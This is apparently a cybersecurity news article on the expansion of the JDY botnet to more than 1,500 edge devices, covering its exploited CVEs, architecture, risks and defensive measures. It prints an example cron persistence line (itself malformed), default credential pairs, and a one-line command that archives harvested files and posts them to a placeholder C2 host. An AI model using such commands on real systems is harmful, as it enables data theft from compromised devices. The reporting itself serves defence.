China-Linked JDY Botnet Expands To 1,500+ Devices

China-Linked JDY Botnet Expands to 1,500+ Devices for Cyber Reconnaissance

A sophisticated China-linked botnet known as JDY has expanded its infrastructure to over 1,500 compromised devices worldwide, primarily targeting network edge devices for cyber reconnaissance operations. The botnet leverages compromised routers, IoT devices, and network appliances to create a distributed attack infrastructure capable of surveillance, credential harvesting, and facilitating further intrusions. Security researchers have observed the threat actor employing advanced evasion techniques and maintaining persistent access across multiple sectors, raising significant concerns about ongoing espionage activities.

Introduction

The cybersecurity community is tracking a significant expansion of the JDY botnet, a malicious network infrastructure attributed to Chinese threat actors. Recent telemetry indicates the botnet has grown to encompass more than 1,500 compromised devices across multiple countries, with a particular focus on network perimeter equipment. Unlike traditional botnets designed for distributed denial-of-service (DDoS) attacks or cryptomining, JDY appears purpose-built for intelligence gathering and reconnaissance operations, demonstrating characteristics consistent with state-sponsored cyber espionage campaigns.

The botnet’s growth pattern and targeting preferences suggest a strategic approach to building resilient command-and-control infrastructure while maintaining operational security. This development underscores the evolving threat landscape where nation-state actors increasingly weaponize consumer and enterprise networking equipment to support long-term intelligence operations.

Background & Context

The JDY botnet first appeared on security researchers’ radar approximately 18 months ago, initially comprising several hundred compromised devices. Attribution to Chinese threat actors stems from multiple indicators including infrastructure overlaps with known Chinese APT groups, operational timing consistent with China Standard Time working hours, and targeting patterns aligned with Chinese strategic interests.

Botnets have traditionally served as tools for cybercriminal enterprises, but nation-state actors have increasingly adopted this technique to create proxy networks that obscure attribution and provide geographic diversity for operations. The JDY botnet follows this pattern, utilizing compromised legitimate devices as stepping stones for reconnaissance and initial access operations.

The targeted devices primarily include end-of-life routers, poorly secured IoT equipment, and network-attached storage (NAS) devices—all of which typically receive minimal security monitoring despite their critical position at network boundaries. This strategic choice allows attackers to intercept traffic, harvest credentials, and establish persistent footholds while remaining below typical detection thresholds.

Technical Breakdown

The JDY botnet employs a multi-stage infection process that begins with scanning for vulnerable devices exposed to the internet. The threat actors exploit both known vulnerabilities and default credentials, with particular focus on devices no longer receiving manufacturer security updates.

Initial Compromise

The infection vector typically involves one of three methods:

- CVE-2021-35394 (Realtek SDK vulnerability)
CVE-2022-30075 (TOTOLINK router vulnerability)  
Default credentials (admin/admin, root/root)

Once initial access is achieved, the malware deploys a lightweight agent designed to evade detection through several techniques:

Persistence Mechanisms

The botnet maintains persistence through cron job modifications and firmware-level implants:

# Example persistence mechanism
/15    * /tmp/.system/update.sh >/dev/null 2>&1

Command and Control

JDY utilizes a decentralized C2 architecture with multiple fallback domains and IP addresses. Communications are encrypted using custom protocols that blend with legitimate HTTPS traffic, making network-based detection challenging.

The botnet implements a tiered architecture where compromised devices serve different roles:

• Proxy nodes: Route attack traffic and obscure origin
• Scanner nodes: Identify new targets for expansion
• Reconnaissance nodes: Monitor network traffic and harvest credentials

Data Exfiltration

Captured data is exfiltrated through encrypted channels, with compression and staging occurring on the compromised device to minimize network signatures:

# Simplified exfiltration pattern
tar czf - /tmp/.harvest/* | openssl enc -aes-256-cbc | curl -X POST https://[C2]/u -d @-

Impact & Risk Assessment

The expansion of JDY to over 1,500 devices represents a significant escalation in capability and reach for the operators. Organizations with compromised devices in their infrastructure face multiple risk categories:

Intelligence Gathering

The primary risk involves unauthorized surveillance of network traffic, potentially exposing sensitive communications, credentials, and proprietary information. Positioned at network boundaries, these devices can intercept both inbound and outbound communications.

Lateral Movement Facilitator

Compromised edge devices provide ideal launching points for deeper network intrusions. Attackers can leverage these footholds to bypass perimeter defenses and access internal systems that would otherwise be unreachable.

Attribution Laundering

Organizations whose devices are compromised may unknowingly become accomplices in attacks against third parties, complicating incident response and potentially exposing them to legal and reputational risks.

Operational Resilience

The distributed nature of the botnet makes takedown efforts challenging. Even if portions of the infrastructure are disrupted, the decentralized architecture allows continued operations through surviving nodes.

Risk Severity: High for organizations in sectors of strategic interest to Chinese intelligence priorities including defense, technology, telecommunications, and critical infrastructure.

Vendor Response

Multiple vendors whose products have been compromised as part of the JDY botnet infrastructure have issued statements and guidance. However, many affected devices are end-of-life products no longer receiving security updates, creating a significant remediation challenge.

Several networking equipment manufacturers have released firmware updates addressing the vulnerabilities exploited by JDY operators:

• Realtek: Issued patches for SDK vulnerabilities but cannot update devices where manufacturers have discontinued support
• TOTOLINK: Released firmware updates for affected router models
• Netgear, TP-Link, and others: Published security advisories recommending device replacement for EOL models

Cloud service providers have begun implementing enhanced detection for traffic patterns associated with JDY infrastructure, though the botnet’s evolution continues to challenge signature-based approaches.

Law enforcement agencies in multiple countries are coordinating efforts to disrupt JDY infrastructure, but the attribution complexities and international jurisdictional issues slow response efforts.

Mitigations & Workarounds

Organizations can implement several measures to reduce exposure to JDY and similar botnet threats:

Immediate Actions

Inventory network edge devices: Identify all routers, IoT devices, and network appliances exposed to the internet:

# Example network discovery scan
nmap -sV -p 80,443,8080,23,22 --script=banner [your-network-range]

Change default credentials: Implement strong, unique passwords for all network devices:

# Generate strong passwords
openssl rand -base64 32

Disable unnecessary services: Reduce attack surface by disabling unused protocols and management interfaces:

# Disable Telnet, enable SSH only from trusted networks
# Configure on device management interface

Strategic Remediation

• Replace EOL devices: Develop hardware refresh cycle prioritizing internet-facing equipment
• Segment networks: Isolate IoT and edge devices on dedicated VLANs with restricted access
• Implement zero-trust architecture: Require authentication and authorization for all device communications
• Enable automatic updates: Where supported, configure automatic firmware updates for security patches

Detection & Monitoring

Identifying JDY infections requires multi-layered detection approaches:

Network Indicators

Monitor for unusual outbound connections from edge devices:

# Example netflow analysis for anomalous connections
# Look for small, regular beaconing traffic patterns
tcpdump -i eth0 -n 'tcp[13] & 2 != 0' -c 100 -w suspicious.pcap

Behavioral Analytics

Establish baselines for normal device behavior and alert on deviations:

• Unexpected CPU or memory utilization spikes
• New processes or services not part of standard firmware
• Outbound connections to unusual geographic locations
• DNS queries to newly registered or suspicious domains

Filesystem Integrity

Implement monitoring for unauthorized filesystem modifications:

# Create checksums of legitimate firmware files
find /bin /sbin /usr/bin -type f -exec sha256sum {} \; > baseline.txt

# Periodically compare against baseline
sha256sum -c baseline.txt

Compromise Indicators

Specific indicators associated with JDY operations include:

• Connections to known C2 domains (consult threat intelligence feeds)
• Presence of hidden directories like /tmp/.system/ or similar naming patterns
• Cron jobs referencing unfamiliar scripts or binaries
• Unusual port scanning activity originating from edge devices

Best Practices

Defending against sophisticated botnet operations requires comprehensive security hygiene:

Device Lifecycle Management

Implement formal processes for tracking device support lifecycles and replacing equipment before it reaches end-of-life status. Budget appropriately for hardware refresh cycles, recognizing that security costs extend beyond initial purchase price.

Network Architecture

Design networks with compromise assumptions built into the architecture. Edge devices should be treated as untrusted by default, with rigorous access controls governing their ability to communicate with internal resources.

Threat Intelligence Integration

Subscribe to threat intelligence feeds covering IoT and botnet activities. Integrate indicators of compromise into security monitoring systems to enable early detection of known malicious infrastructure.

Vendor Security Assessment

When selecting network equipment vendors, evaluate their security track record including:

• Frequency and quality of security updates
• Support lifecycle duration
• Security vulnerability disclosure practices
• Built-in security features like secure boot and firmware signing

Incident Response Preparation

Develop specific playbooks for responding to compromised edge devices, including isolation procedures, forensic collection approaches, and decision trees for device replacement versus remediation.

Key Takeaways

• The JDY botnet has expanded to over 1,500 compromised devices worldwide, primarily targeting network edge equipment for reconnaissance operations
• Attribution indicators point to Chinese threat actors employing the infrastructure for intelligence gathering aligned with strategic interests
• Compromised devices include routers, IoT equipment, and NAS devices, many of which are end-of-life products no longer receiving security updates
• The botnet employs sophisticated evasion techniques, encrypted C2 communications, and a decentralized architecture that complicates disruption efforts
• Organizations face risks including unauthorized surveillance, facilitation of lateral movement, and unwitting participation in attacks against third parties
• Effective defense requires comprehensive device inventory, replacement of EOL equipment, network segmentation, and behavioral monitoring
• The incident underscores the critical importance of security considerations in network edge device procurement and lifecycle management

References

• CISA Advisory: Securing Network Infrastructure Devices
• MITRE ATT&CK: Techniques observed in botnet operations (T1090 – Proxy, T1595 – Active Scanning)
• Vendor security advisories from affected device manufacturers
• Threat intelligence reports from cybersecurity firms tracking Chinese APT activities
• IoT Security Best Practices Framework – NIST Cybersecurity for IoT Program

Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/